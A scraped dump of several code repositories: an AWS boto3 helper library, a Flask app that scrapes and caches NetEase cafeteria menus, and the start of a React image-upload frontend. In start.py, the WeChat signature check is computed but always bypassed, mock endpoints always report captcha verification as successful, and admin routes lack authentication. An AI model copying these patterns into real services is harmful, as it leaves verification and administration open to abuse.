remove_permission_for_s3_bucket(self, name, bucket): self._logger.info('Attempting to remove permission to invoke function: %s based on events from S3 bucket: %s ' 'if any', name, bucket) try: self.lambda_client.remove_permission(FunctionName=name, StatementId=f'permission_for_{bucket}') # NOTE: there's no clean way to first look up if a permission exists before removing it without re-arranging # this module, so for now we just catch the exception and move on. except self.lambda_client.exceptions.ResourceNotFoundException: self._logger.warning('Permission does not yet exist to invoke function: %s based on events from ' 'S3 bucket: %s', name, bucket) <file_sep>import json from madeira import session, sts from madeira_utils import loggers class Ecr(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.ecr_client = self._session.session.client("ecr") def _get_registry_id_for_repo(self, repo_name): for repo in self.ecr_client.describe_repositories().get("repositories"): if repo["repositoryName"] == repo_name: return repo["registryId"] def add_account_to_repo_policy(self, secondary_account_id, repo_name): registry_id = self._get_registry_id_for_repo(repo_name) # it is possible that there is no existing policy try: policy = json.loads( self.ecr_client.get_repository_policy( registryId=registry_id, repositoryName=repo_name ).get('policyText')) self._logger.info("Got existing policy for repo: %s in registry: %s", repo_name, registry_id) except self.ecr_client.exceptions.RepositoryPolicyNotFoundException: self._logger.warning( "There no existing policy for repo: %s in registry: %s", repo_name, registry_id, ) # set an empty base policy to augment hereafter policy = { "Version": "2008-10-17", "Statement": [] } # drop any statements that already have this account referenced for statement in policy["Statement"]: if secondary_account_id in statement.get("Principal", {}).get("AWS"): policy["Statement"].remove(statement) # any principal in the secondary account can describe + retrieve images policy["Statement"].append( { "Effect": "Allow", "Principal": {"AWS": f"arn:aws:iam::{secondary_account_id}:root"}, "Action": [ "ecr:BatchCheckLayerAvailability", "ecr:BatchGetImage", "ecr:GetAuthorizationToken", "ecr:GetDownloadUrlForLayer" ] } ) self._logger.info("Setting updated repository policy to allow account: %s to access repo: %s in registry: %s", secondary_account_id, repo_name, registry_id) self.ecr_client.set_repository_policy( registryId=registry_id, repositoryName=repo_name, policyText=json.dumps(policy), ) def delete_images(self, repo, image_ids): return self.ecr_client.batch_delete_image(repositoryName=repo, imageIds=image_ids) def get_image_list(self, repo): # TODO: implement "NextToken" processing return self.ecr_client.list_images(repositoryName=repo, maxResults=1000).get('imageIds') <file_sep>from madeira import session from madeira_utils import loggers class CloudWatch(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.cloudwatch_logs_client = self._session.session.client('logs') def delete_log_groups_in_namespace(self, namespace): # TODO: implement NextToken support self._logger.debug('Getting log groups in namespace (prefixed with): %s', namespace) log_groups_in_namespace = self.cloudwatch_logs_client.describe_log_groups( logGroupNamePrefix=namespace).get('logGroups', []) for log_group in log_groups_in_namespace: self._logger.info('Deleting log group: %s', log_group['logGroupName']) self.cloudwatch_logs_client.delete_log_group(logGroupName=log_group['logGroupName']) def set_log_group_retention(self, log_group, days): return self.cloudwatch_logs_client.put_retention_policy(logGroupName=log_group, retentionInDays=days)
9354026e4ba72cf6a42f054b29292e60e5fabe87
[ "TOML", "Python", "Markdown", "Shell" ]
28
Python
mxmader/madeira
f9d1fbd3b34373571ebb84ab33852b06577e70cf
5a29abf792a3ac08ccda4efda6985883a0fb1736
refs/heads/master
<repo_name>arcsun/neteaseMenu<file_sep>/codepy/menu.py #coding=utf-8 import time import copy import anydbm as dbm import menulog urlhead = 'http://numenplus.yixin.im/singleNewsWap.do?materialId=' frequency = 10800 class Menu: def __init__(self, day= 0): self.today = int(time.strftime('%y%m%d',time.localtime(time.time()))) # 151022 self.returnMaybe = False self.gotoid = False if 0 <= day <= 99: self.today = self.getNextDay(self.today, day) elif 100<= day <= 9999: self.returnMaybe = True elif 10000<= day < 99999: self.gotoid = True self.today = day elif 151027<= day < 991231: self.today = day self.startId = 0 self.result = u'未找到菜单' self.lastQuery = 0 self.now = int(time.time()) self.cache = {} # {151019:15163} # 日期:id self.maybe = [] # 爬到的报错的页面 self.maybeUrl = '' self.tmp = 0 def getNextDay(self, today, step= 1): def calcu(): lastDays = {'0131': '0201', '0228': '0301', '0331': '0401', '0430': '0501', '0531': '0601', '0630': '0701', '0731': '0801', '0831': '0901', '0930': '1001', '1031': '1101', '1130': '1201', '1231': '0101'} # 16年是闰年,暂把2月设成0229 now = str(self.tmp) year = now[0:2] # 15 monthday = now[2:] # 1221 if monthday in lastDays.keys(): if monthday == '1231': year = str(int(year) + 1) tomorrow = lastDays[monthday] self.tmp = int(year + tomorrow) else: self.tmp = int(now)+1 self.tmp = today for i in range(step): calcu() return self.tmp def process(self): def getTime(): return time.strftime('20%y-%m-%d %H:%M:%S', time.localtime()) def getUrl(targetday = self.today): return urlhead + str(self.cache.get(targetday)) def getMaybe(): backup = copy.deepcopy(self.maybe) backup.sort() backup.reverse() self.result += u'\t 可能的url: ' first = True for mid in backup: if mid >= max(self.cache.values()): if first: first = False self.result += u'\t' + urlhead+ str(mid) if self.returnMaybe: self.maybeUrl = urlhead+ str(mid) else: self.result += '\t' + str(mid) else: self.maybe.remove(mid) if not self.maybe: self.result += 'None' else: menulog.debug(self.result) if self.gotoid: return urlhead + str(self.today) try: db = dbm.open('datafile', 'r') self.startId = eval(db['startId']) self.lastQuery = eval(db['lastQuery']) self.cache = eval(db['cache']) self.maybe = eval(db['maybe']) db.close() except (IOError, KeyError): msg = u'未找到缓存数据' menulog.debug(msg) return msg if self.today in self.cache.keys(): # 缓存里有就直接返回url menulog.info('find cache @%s'% getTime()) return getUrl() else: # 缓存中查不到 menulog.info('cache not found @%s'% getTime()) if self.result == u'未找到菜单': getMaybe() if self.returnMaybe and self.maybeUrl: return self.maybeUrl else: self.result += u'\t下次刷新:约%d秒后'% (self.lastQuery + frequency - self.now) self.result += u'\t日期:%s'% self.today return self.result <file_sep>/mock.py #coding=utf-8 from flask import Flask, redirect, render_template, request, Response from codepy import menulog import anydbm as dbm import shelve import os, sys import urllib from datetime import datetime import time import urllib2 import hashlib app = Flask(__name__) visit = 0 visitHome = 0 startTime = time.time() cache = {} s = None @app.route('/', methods=['POST', 'GET']) def mockMain(): return "hello mock" @app.route('/api/v1/verify', methods=['POST', 'GET']) def mockYidun(): # 易盾滑块后端验证 resp = Response('{"msg":"success","result":true,"c":1,"error":0}') resp.headers['Content-Type'] = 'application/json;charset=UTF-8' return resp @app.route('/api/v2/verify', methods=['POST', 'GET']) def mockYidun2(): # 易盾滑块后端验证v2 resp = Response('{"msg":"success","result":true,"c":1,"error":0}') resp.headers['Content-Type'] = 'application/json;charset=UTF-8' return resp if __name__ == '__main__': if sys.platform.startswith('win'): # 本地调试 # import webbrowser # webbrowser.open('http://127.0.0.1:8080/') app.run(host='127.0.0.1', port= 8080, debug= True, threaded= True) else: # 线上正式版本 # app.run(host='0.0.0.0', port= 5050, threaded= True) from werkzeug.contrib.fixers import ProxyFix app.wsgi_app = ProxyFix(app.wsgi_app) app.run(host='0.0.0.0', port= 5050) <file_sep>/test_new_url.py # coding=utf-8 import urllib import re import urllib2 import cookielib from urllib2 import HTTPError """ 用来测试新的URL GET /wap/material/viewImageText?id=31415424 HTTP/1.1 Host: wap.plus.yixin.im Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 x-wap-profile: http://172.16.31.10/UAProfile/CMCC/MT6797_UAprofile.xml Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Linux; Android 6.0; MZ-PRO 6 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/45.0.2454.94 Mobile Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,en-US;q=0.8 Cookie: NTESplusSI=6B8336B65EE6B94C690E1E6A42C6691A.yx10.popo.infra.mail-8011; __utma=75741715.572861464.1482587990.1482587990.1482587990.1; __utmb=75741715.2.10.1482587990; __utmc=75741715; __utmz=75741715.1482587990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) """ ua_yixin = 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36' accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' def test(tid, save= False): try: url = 'http://wap.plus.yixin.im/wap/material/viewImageText?id=%s'% tid req = urllib2.Request(url) req.add_header('User-Agent', ua_yixin) # 易信外会有个广告 req.add_header('Accept', accept) # 易信会检测这个 res = urllib2.urlopen(req) text = res.read() t = text.decode('utf-8') # 这里print会报错 if save: f = open('page.html', 'w+') f.write(text) f.close() if t.find(u'今日菜单') != -1 and t.find(u'本帮菜') != -1: return '%s find++++++++++++++++++'% tid, True else: return '%s not find'%tid, False except Exception as e: return '%s error--------------'% tid, False # 这个id似乎是固定的 pageList = { 1: 31415423, 2: 31704345, 3: 31704346, 4: 31700488, 5: 31613351, 6: 31415424, # 待定 } print test(pageList.get(4)) # # result = [] # for i in range(pageList.get(3)+1, pageList.get(3)+2000): # r = test(i) # if r[1]: # result.append(i) # print r[0], r[1] # break # print r[0] # print result<file_sep>/README.md #网易(杭州)菜单 v2.7 示例网址: www.crystalpot.cn/menu 微信公众号:neteasemenu 运行环境: python 2.7 Flask==0.10.1 Jinja2==2.8 Werkzeug==0.10.4 bgtask.py: 自动定时抓取信息,需首先执行: (python bgtask.py &) 抓取到的url等信息存储在文件datafile中 run.py: web程序入口, python run.py 或使用gunicorn等启动 gunicorn -b 0.0.0.0:5000 -k gevent run-ol:app 日志记录在menu.log codepy: web和日志部分的代码 读取bgtask.py生成的文件 <file_sep>/restart_mock.sh #!/bin/bash ps -ef | grep "gunicorn -b 0.0.0.0:5050 -k gevent mock:app" | awk '{print $2}' | xargs kill -9 sleep 2 gunicorn -b 0.0.0.0:5050 -k gevent mock:app <file_sep>/bgtask.py # #coding=utf-8 import time import urllib, urllib2 import re import anydbm as dbm from codepy import menulog ''' (python bgtask.py &) 用于抓取菜单信息 地址格式变更?这个可以直接访问 http://wap.plus.yixin.im/wap/material/viewImageText?id=31613351 ''' pattern_title = r"<title>(.+)</title>" pattern_weekday = ur"(星期(.))" pattern_year = ur'20(\d\d)-' pattern_month_update = r'-(\d+)-' pattern_month = r'>(\d+)</span>' pattern_day = ur'月(\d+)日' pattern_day2 = ur'>(\d+)日' urlhead = 'http://numenplus.yixin.im/singleNewsWap.do?materialId=' datafile = 'datafile' startId = 53370 def getWebContent(url): try: url += '&companyId=1' req = urllib2.Request(url) req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3') res = urllib2.urlopen(req) html = res.read().decode('utf-8') return html except Exception as e: menulog.debug(str(e)) return '' class Background: def __init__(self): self.frequency = 10800 # 间隔(秒) self.interval = 150 # 每次爬的id数量 self.back = 0 # 每次从self.startId - self.back开始查找,防止被占坑 self.firstRun = True # 是否在程序开始后先执行一次 self.today = 0 self.running = False # 是否正在运行(否则同一秒会重复执行多次) self.startId = 0 self.count = 0 self.usedId = 0 # 记录中间最大的非空id self.nowId = self.startId self.result = u'未找到菜单' self.lastQuery = 0 self.cache = {} # {151019:15163} # 日期:id self.maybe = [] # 爬到的报错的页面 self.empty = 0 self.maxEmpty = 100 # 连续多少空页后中断; 近期总是跳着使用id def getTime(self): return int(time.time()) def schedule(self): if self.firstRun: self.firstRun = False self.process() self.schedule() # 可用Timer().start()替换 else: while True: time.sleep(0.1) # 可以极大减少cpu占用 if self.getTime() % self.frequency == 0 and not self.running: self.running = True self.process() elif self.getTime() % 3600 == 0: # 每3600s记录一次存活信息 menulog.info('%s@%d'% (time.strftime('20%y-%m-%d %H:%M:%S', time.localtime()), self.getTime())) time.sleep(1) def process(self): self.count += 1 self.today = int(time.strftime('%y%m%d', time.localtime())) menulog.info(u'开始第%d次查找@%d'% (self.count, self.getTime())) try: db = dbm.open(datafile, 'c') if not len(db): # 没有之前的数据文件 db['startId'] = str(startId) db['lastQuery'] = str(self.getTime()) db['cache'] = str(self.cache) db['maybe'] = str(self.maybe) self.startId = eval(db['startId']) - self.back self.cache = eval(db['cache']) self.maybe = eval(db['maybe']) self.nowId = self.startId self.lastQuery = self.getTime() # 保存最后搜索时间 while self.nowId - self.startId < self.interval: menulog.info(u'开始查找: %d'% self.nowId) text = getWebContent(urlhead+ str(self.nowId)) if text.find(u'今日菜单') != -1 and text.find(u'本帮菜') != -1: self.empty = 0 try: year = re.findall(pattern_year, text)[0] monthday = re.findall(pattern_month, text) if monthday[0] == '0' and len(monthday)> 2: month = monthday[0]+monthday[1] dayIndex = 2 else: month = monthday[0] dayIndex = 1 if len(monthday) > dayIndex: day = monthday[dayIndex] if len(day) == 1: # 针对 1</span>...>5日&nbsp # 上面的月份也有这种情况 day += re.findall(pattern_day2, text)[0] else: day = re.findall(pattern_day, text)[0] update_month = re.findall(pattern_month_update, text)[0] # 发布菜单的月份,用于跨年 if int(update_month) == 12 and int(month) == 1: year = str(int(year)+1) thisday = int(year+month+day) self.startId = self.nowId if self.cache.has_key(thisday): menulog.info(u'更新%s的菜单id为%s'% (thisday, self.nowId)) self.cache[thisday] = self.nowId menulog.info('find %d'% self.nowId) except (IndexError, ): if self.nowId not in self.maybe: self.maybe.append(self.nowId) menulog.debug('IndexError add maybe') else: if text.find(u'请求素材不存在') == -1: # 搜索到的结果页有内容(不是菜单) self.usedId = self.nowId self.empty = 0 else: self.empty += 1 menulog.info('empty(%d) %d'% (self.empty, self.nowId)) if self.empty > self.maxEmpty: menulog.debug('break this round') break self.nowId += 1 # if self.maybe and max(self.maybe) > max(self.cache.values()): # # 取消这个设计, 格式变化太大, 很可能导致卡住 # menulog.info(u'更新起点至可能的ID:%d'% max(self.maybe)) # self.startId = max(self.maybe) if self.usedId > self.startId: menulog.info(u'更新起点至%d'% self.usedId) self.startId = self.usedId # 保存 db['startId'] = str(self.startId) db['lastQuery'] = str(self.lastQuery) db['cache'] = str(self.cache) db['maybe'] = str(self.maybe) menulog.info(u'第%d次查找结束'% self.count) # 已更新的菜单 self.cache = eval(db['cache']) future = [] for day in self.cache.keys(): if day >= self.today: future.append(day) future.sort() db['future'] = str(future) menulog.info(u'更新今后已找到的菜单列表') db.close() except (IOError, EOFError): menulog.info(u'缓存读取/创建异常') finally: self.running = False Background().schedule() <file_sep>/codepy/menulog.py #coding=utf-8 import logging import logging.handlers LOG_FILE = 'menu.log' handler = logging.handlers.RotatingFileHandler(LOG_FILE, maxBytes = 1024*1024, backupCount = 5) # 实例化handler fmt = '[%(levelname)s]%(asctime)s: %(message)s' formatter = logging.Formatter(fmt) # 实例化formatter handler.setFormatter(formatter) # 为handler添加formatter logger = logging.getLogger('menu') # 获取名为tst的logger logger.addHandler(handler) # 为logger添加handler logger.setLevel(logging.DEBUG) def info(msg): print u'[info@szy]%s'% msg logger.info(msg) def debug(msg): print u'[debug@szy]%s'% msg logger.debug(msg)<file_sep>/requirements.txt Flask==0.12 Jinja2==2.9.5 Werkzeug==0.11.15 <file_sep>/restart.sh #!/bin/bash ps -ef | grep "gunicorn -b 0.0.0.0:5000 -k gevent start:app" | awk '{print $2}' | xargs kill -9 ps -ef | grep bgtask.py | awk '{print $2}' | xargs kill -9 sleep 2 (setsid python bgtask.py &) gunicorn -b 0.0.0.0:5000 -k gevent start:app <file_sep>/start.py #coding=utf-8 from flask import Flask, redirect, render_template, request, Response from codepy import menulog import anydbm as dbm import shelve import os, sys import urllib from datetime import datetime import time import urllib2 import hashlib app = Flask(__name__) visit = 0 visitHome = 0 startTime = time.time() token = 'hz<PASSWORD>' # 微信公众号的token,自行设置 cache = {} s = None def checkSign(signature, timestamp, nonce): # 微信签名 args = [] args.append("token=%s" % token) args.append("timestamp=%s" % timestamp) args.append("nonce=%s" % nonce) args = sorted(args) raw = "&".join(args) sign = hashlib.sha1(raw).hexdigest() menulog.info(signature) menulog.info(sign) return signature == sign def saveCache(key, content): """ 现在需要服务器中转才能访问,做个简单的缓存 """ if len(cache) >= 10: cache.clear() cache[key] = content def addOne(page= 1): """访问计数""" try: if not s: globals()['s'] = shelve.open('visit_count.dat', writeback=True) if page == 0: s['count_home'] = 0 if s.get('count_home') is None else s['count_home']+1 elif page == 1: s['count_menu'] = 0 if s.get('count_menu') is None else s['count_menu']+1 s.sync() except Exception as e: menulog.debug(e) @app.route('/menu/cache') def getCache(): return str(cache.keys()) def getWebContent(url): try: fname = url.split('?')[1].replace('=', '_') if cache.get(fname): return cache.get(fname) else: req = urllib2.Request(url+ '&companyId=1') # update:增加了这个参数 req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3') res = urllib2.urlopen(req) html = res.read().decode('utf-8') saveCache(fname, html) return html except Exception as e: menulog.debug(str(e)) return '' @app.route('/') def hello_world(): return redirect('/menu') @app.route('/menus/sign') def weixin_sign(): # 微信配置认证 menulog.info('weixin sign') signature = request.args.get('signature', '') timestamp = request.args.get('timestamp', '') nonce = request.args.get('nonce', '') echostr = request.args.get('echostr', '') valid = checkSign(signature, timestamp, nonce) if valid: return echostr else: # 目前签名有bug,暂都返回成功 return echostr @app.route('/menu/<int:day>', methods = ['GET', 'POST']) def menu(day=0): # 0今天, 1明天, 151202指定日期 if request.method == 'POST': day = int(request.form['day']) # update:现在易信增加了对User-Agent的限制,必须使用中转的接口了 return redirect('/menus/%s'% day) # from codepy import menu # globals()['visit'] += 1 # menulog.info(u'访问菜单@%s'% visit) # url = menu.Menu(day).process() # if url.startswith('http'): # return redirect(url) # else: # return url @app.route('/menus/<int:day>', methods = ['GET', 'POST']) def menus(day=0): # 为解决微信内跳转卡住的问题, 增加这个方法 # 服务器从易信读取网页信息后再返回给用户 from codepy import menu if request.method == 'POST': day = int(request.form['day']) addOne(1) globals()['visit'] += 1 menulog.info(u'访问菜单@%s'% visit) url = menu.Menu(day).process() if url.startswith('http'): return getWebContent(url) else: return url @app.route('/menus/bus') def bus(): # 班车路线页, 中转一下 addOne(1) globals()['visit'] += 1 menulog.info(u'访问菜单@%s'% visit) url = "http://numenplus.yixin.im/multiNewsWap.do?multiNewsId=17011" # 更新周期很长,暂手动更新 try: return getWebContent(url) except: return u'网页访问出错' def getWeekDayFromDay(daytime): """根据日期(如20160517)计算是星期几""" try: daytime = '20'+ str(daytime) # '20160517' year = int(daytime[:4]) # 2016 month = int(daytime[4:6]) # 5 day = int(daytime[6:8]) # 17 weekday = datetime(year, month, day, 0, 0, 0, 0).weekday() weekdaynames= { 0: u'星期一', 1: u'星期二', 2: u'星期三', 3: u'星期四', 4: u'星期五', 5: u'星期六', 6: u'星期日', } return weekdaynames.get(weekday, u'') except: menulog.debug(u'获取星期几错误') return u'' @app.route('/menu') def menuList(): addOne(0) globals()['visitHome'] += 1 menulog.info(u'访问主页@%s'% visitHome) try: db = dbm.open('datafile', 'c') cache = eval(db['cache']) future = eval(db['future']) maybe = eval(db['maybe']) maybe.sort() vals = {} for day in future: vals[day] = cache[day] db.close() weekdays = {} for day in vals.keys(): weekdays[day] = getWeekDayFromDay(day) return render_template('menu.html', vals= vals, days= future, weekdays= weekdays, maybe= maybe, total=(s.get('count_menu'), s.get('count_home'))) except (IOError, KeyError): msg = u'缓存读取错误' menulog.info(msg) return msg @app.route('/menu/manage/hzmenu') def manage(): seconds = int(time.time()- startTime) days = seconds/(24*60*60) if days >= 1: seconds -= 24*60*60*days hours = seconds/(60*60) if hours >= 1: seconds -= 60*60*hours miniutes = seconds/60 if miniutes >= 1: seconds -= 60*miniutes timestr = u'本次已运行:%s天%s小时%s分钟%s秒'% (days, hours, miniutes, seconds) return render_template('manage.html', visit= visit, visitHome= visitHome, timestr= timestr, total=(s.get('count_menu'), s.get('count_home'))) @app.route('/menu/info') def info(): try: db = dbm.open('datafile', 'r') msg = str(db) db.close() return msg except (IOError, KeyError): return u'缓存读取错误' @app.route('/menu/delete/<int:day>', methods = ['GET', 'POST']) def delete(day= 150101): try: db = dbm.open('datafile', 'w') if request.method == 'POST': day = int(request.form['day']) cache = eval(db['cache']) if cache.has_key(day): del cache[day] msg = u'删除%s'% day else: msg = u'del key not found' menulog.info(msg) db['cache'] = str(cache) db.close() return msg except (IOError, KeyError): return u'缓存读取错误' @app.route('/menu/delfuture/<int:day>', methods = ['GET', 'POST']) def delfuture(day= 161300): try: db = dbm.open('datafile', 'w') if request.method == 'POST': day = int(request.form['day']) future = eval(db['future']) if day in future: future.remove(day) msg = u'删除%s'% day else: msg = u'del key not found' menulog.info(msg) db['future'] = str(future) db.close() delete(day) return msg except (IOError, KeyError) as e: print e return u'缓存读取错误' @app.route('/menu/refreshlist') def refreshlist(): try: db = dbm.open('datafile', 'w') cache = eval(db['cache']) future = [] today = int(time.strftime('%y%m%d',time.localtime(time.time()))) for day in cache.keys(): if day >= today: future.append(day) future.sort() db['future'] = str(future) msg = u'更新%s后已找到的菜单列表 from homepage'% today menulog.info(msg) db.close() return msg except (IOError, KeyError): return u'缓存读取错误' @app.route('/menu/clear') def clearMaybe(): # 清空可能的菜单(maybe=[]) try: db = dbm.open('datafile', 'w') db['maybe'] = '[]' db.close() msg = u'清空maybe' menulog.info(msg) return msg except (IOError, KeyError): msg = u'缓存读取错误' menulog.info(msg) return msg @app.route('/menu/start/<int:startid>', methods = ['GET', 'POST']) def start(startid= 17000): # 设置起始查找点为指定值 try: if request.method == 'POST': startid = int(request.form['startid']) db = dbm.open('datafile', 'w') db['startId'] = str(startid) db.close() msg = u'设置查找起点ID为:%d'% startid menulog.info(msg) return msg except (IOError, KeyError): msg = u'缓存/POST参数读取错误' menulog.info(msg) return msg @app.route('/menu/add/<int:day>/<int:mid>', methods = ['GET', 'POST']) def add(day= 151203, mid= 17063): # 手动添加一个菜单(偶尔发布者会填错日期) try: db = dbm.open('datafile', 'w') cache = eval(db['cache']) if request.method == 'POST': day = int(request.form['day']) mid = int(request.form['mid']) cache[day] = mid db['cache'] = str(cache) msg = u'更新%s的菜单id为%s'% (day, mid) menulog.info(msg) db.close() return msg except (IOError, KeyError): msg = u'缓存/POST参数读取错误' menulog.info(msg) return msg @app.route('/menu/log/<int:lines>') def readLog(lines= 0): # 读取多少行log, 0为全部 f = None try: files = os.listdir('./') files.sort() logs = [] for fname in files: if fname.startswith('menu.log'): logs.append(fname) if logs: f = open(logs[-1]) contents = f.readlines() content = '' if lines == 0: lines = len(contents) line = 0 for msg in reversed(contents): line += 1 if line < lines: content += msg+ '<br>' else: break return content.decode('utf-8') else: return u'暂无日志' except IOError: return '读取日志出错' finally: if f: f.close() @app.route('/api/v1/verify', methods=['POST', 'GET']) def mockYidun(): resp = Response('{"msg":"success","result":true,"c":1,"error":0}') resp.headers['Content-Type'] = 'application/json;charset=UTF-8' return resp @app.route('/api/v2/verify', methods=['POST', 'GET']) def mockYidun2(): resp = Response('{"msg":"success","result":true,"c":1,"error":0}') resp.headers['Content-Type'] = 'application/json;charset=UTF-8' return resp if __name__ == '__main__': if sys.platform.startswith('win'): # 本地调试 # import webbrowser # webbrowser.open('http://1192.168.3.11:80/menu') app.run(host='127.0.0.1', port= 80, debug= True) elif len(sys.argv)> 1: # 线上调试, 随便传个参数 app.run(host='0.0.0.0', port= 5000, debug= True) else: # 线上正式版本, 用gunicorn启动 from werkzeug.contrib.fixers import ProxyFix app.wsgi_app = ProxyFix(app.wsgi_app) app.run(host='0.0.0.0', port= 5000) <file_sep>/test.py # coding=utf-8 import urllib import re import urllib2 """ 用来测试新的正则 """ def test(): pattern_title = r"<title>(.+)</title>" pattern_weekday = ur"(星期(.))" pattern_year = ur'20(\d\d)-' pattern_month_update = r'-(\d+)-' pattern_month = r'>(\d+)</span>' pattern_day = ur'月(\d+)日' pattern_day2 = ur'>(\d+)日' urlhead = 'http://numenplus.yixin.im/singleNewsWap.do?materialId=' datafile = 'datafile' page = urllib.urlopen(urlhead+ str(36673)) text = page.read().decode('utf-8') if text.find(u'今日菜单') != -1: print 'find' year = re.findall(pattern_year, text)[0] print 'year: %s'% year monthday = re.findall(pattern_month, text) print 'monthday: %s'% monthday if monthday[0] == '0' and len(monthday)> 2: month = monthday[0]+monthday[1] dayIndex = 2 else: month = monthday[0] dayIndex = 1 print 'month: %s'% month if len(monthday) > dayIndex: day = monthday[dayIndex] if len(day) == 1: # 针对 1</span>...>5日&nbsp day += re.findall(pattern_day2, text)[0] else: day = re.findall(pattern_day, text)[0] print 'day: %s'% day update_month = re.findall(pattern_month_update, text)[0] # 发布菜单的月份,用于跨年 if int(update_month) == 12 and int(month) == 1: year = str(int(year)+1) thisday = int(year+month+day) print 'thisday: %s'% thisday print 'update_month: %s'% update_month else: print 'not find' def test2(mid): req = urllib2.Request('http://numenplus.yixin.im/singleNewsWap.do?materialId=%s&companyId=1'% mid) req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3') try: res = urllib2.urlopen(req, timeout= 5) html = res.read().decode('utf-8') return html, html.find(u'今日菜单') != -1, html.find(u'请求素材不存在') != -1 except Exception as e: print mid, e return 'timeout', False, True def testBus(mid): url = "http://numenplus.yixin.im/multiNewsWap.do?multiNewsId=%s"%mid req = urllib2.Request(url+ '&companyId=1') req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3') res = urllib2.urlopen(req) html = res.read().decode('utf-8') return html for i in range(69948, 70100): result = test2(i) if result[1] is True: key = 'menu' elif result[2] is False: key = 'exist' else: key = 'p' print i, result[1], result[2], key # # for i in range(10490, 11000): # r = testBus(i) # if r.find(u'杭州网易班车线路') != -1: # print i, True, '+++++++++++' # elif r.find(u'请求多图文素材不存在') != -1: # break # else: # print i
d19ff57c98e244489115e071924d6164c72141f0
[ "Markdown", "Python", "Text", "Shell" ]
11
Python
arcsun/neteaseMenu
884f8b9808edec8009e9a194a43bee67c7134d66
de8a671157d6cb88afbbd9df724957ca051b713c
refs/heads/master
<file_sep>import React,{useState,useEffect} from 'react' import Usercontext from './Context/Usercontext' import axiox from 'axios' import { BrowserRouter, Route, Switch,Redirect} from "react-router-dom"; import Login from './auth/Login'; import Register from './auth/Register'; import Home from './components/Home'; function App() { const [userData, setuserData] = useState({ token:undefined, userName:undefined, userEmail:undefined, userId:undefined, }) useEffect(() => { try { const checkLoginuser=async()=>{ let token=window.localStorage.getItem('auth-token'); if(token === null){ window.localStorage.setItem("auth-token"," "); token="" } const tokenresponse=await axiox.post("https://mern-image-upload.herokuapp.com/api/v1/user/tokenIsvalid",null,{headers:{"x-auth-token":token}}) if(tokenresponse.data){ const userRes=await axiox.get("https://mern-image-upload.herokuapp.com/api/v1/user/",{headers:{"x-auth-token":token}}) window.localStorage.setItem('id',userRes.data.id) setuserData({ token, userName:userRes.data.name, userEmail:userRes.data.email, userId:userRes.data.id }) } } checkLoginuser() } catch (error) { console.log(error); } }, [setuserData]) return ( <> <BrowserRouter> <Usercontext.Provider value={{userData,setuserData}} > <Switch> <Route path="/register" component={Register}/> <Route path="/"exact component={Login}/> <Route path="/login" component={Login}/> <Route path="/accessuser" exact component={Home}/> <Redirect to="/accessuser" /> </Switch> </Usercontext.Provider> </BrowserRouter> </> ) } export default App <file_sep>import React, { useContext } from "react"; import { useHistory } from "react-router-dom"; import ExitToAppIcon from "@material-ui/icons/ExitToApp"; import logo from "../Asserts/Network.png"; import Usercontext from "../Context/Usercontext"; import "./header.css"; function Header() { const history = useHistory(); const { userData } = useContext(Usercontext); const handellogout = () => { window.localStorage.removeItem("auth-token"); history.push("/login"); }; return ( <div className="search__bar" style={{ display: "flex", position: "sticky", top: "-1px", backgroundColor: "#000000", zIndex: "10", }} > <img src={logo} alt="logo" width="200px" className="logo" /> <div className="ml-auto pt-2 d-flex aligh-center"> <img src={`https://avatars.dicebear.com/4.5/api/avataaars/${userData.userID}fsdffgfdfc.svg`} alt=".." width="30px" />{" "} <h5 className=" text-white pt-2 user_name">{userData.userName}</h5> </div> <button className="btn btn-danger ml-auto mr-3 " data-bs-toggle="tooltip" data-bs-placement="bottom" title="Logout" onClick={handellogout} > <ExitToAppIcon className="exit_btn" /> </button> </div> ); } export default Header; <file_sep>import React, { useEffect, useState } from "react"; import axios from "axios"; import IconButton from "@material-ui/core/IconButton"; import FavoriteBorderIcon from "@material-ui/icons/FavoriteBorder"; import { useHistory } from "react-router-dom"; import SendIcon from "@material-ui/icons/Send"; import BookmarkBorderIcon from "@material-ui/icons/BookmarkBorder"; import DeleteForeverIcon from "@material-ui/icons/DeleteForever"; import style from "./Displayimage.module.css"; function Displayimage(props) { const [serverData, setserverData] = useState([]); let history = useHistory(); useEffect(() => { try { const getuserimage = async () => { try { const serverRes = await axios.get( "https://mern-image-upload.herokuapp.com/api/v1/user/image/server/" ); setserverData(serverRes.data); } catch (error) { console.log(error); } }; getuserimage(); } catch (error) { console.log(error); } }, [props.serverRes, setserverData]); const handellike = async (id) => { await axios.post( `https://mern-image-upload.herokuapp.com/api/v1/user/likes/${id}` ); // get like data const serverRes = await axios.get( 